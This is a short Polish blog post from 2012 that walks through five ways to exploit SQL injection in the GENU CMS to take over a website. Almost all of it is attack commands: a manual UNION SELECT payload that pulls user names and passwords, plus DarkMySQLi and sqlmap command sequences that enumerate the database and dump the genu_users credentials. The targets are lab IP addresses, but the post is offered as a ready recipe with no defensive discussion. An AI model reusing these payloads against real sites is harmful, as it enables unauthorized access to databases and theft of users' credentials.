poniedziałek, 9 kwietnia 2012

Advanced sql injection (5 sposobow jak przejac kontrole nad strona www)

havij | manual | mms_05.jar | DarkMySQLi | sqlmap
download podatnego systemu cms do pobrania z tad
 http://www.exploit-db.com/exploits/18708/
1. havij
download
http://itsecteam.com/en/projects/project1_page2.htm
2. manual
 http://192.168.1.102/GENU-2012.3/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--
3. mms_05.jar
download
http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r
java -jar mms_05.jar
http://192.168.1.104/GENU-2012.3/
 4. DarkMySQLi
cd /pentest/web/darkmysqli
python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" --findcol

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" --dbs

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" --full

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" -D baza -T genu_users -C user_name,user_password --dump

5. sqlmap
cd /pentest/database/sqlmap/
python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" --dbs

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza --tables

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza -T genu_users --columns

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza -T genu_users -C user_email,user_name,user_password --dump

GAME OVER
Autor: o 08:24

Brak komentarzy:

Prześlij komentarz

Subskrybuj: Komentarze do posta (Atom)